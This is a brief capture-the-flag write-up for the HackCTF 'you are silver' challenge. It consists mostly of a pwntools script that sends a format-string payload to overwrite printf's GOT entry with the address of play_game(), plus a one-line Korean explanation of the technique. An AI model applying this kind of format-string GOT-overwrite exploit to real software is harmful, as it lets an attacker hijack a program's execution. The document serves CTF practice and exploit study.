[hackctf] you are silver

from pwn import *

#p = process('./you_are_silver')
p = remote('ctf.j0n9hyun.xyz', 3032)
e = ELF('./you_are_silver')

context.log_level = "debug"

p.recv()

payload = '%4196055c' + '%8$ln' + 'a' * 2  + p64(e.got['printf']) + 'a' * 40

p.sendline(payload)

p.interactive()

fsb를 이용하여 printf()함수를 play_game()으로 바꾸면 익스가 가능하다.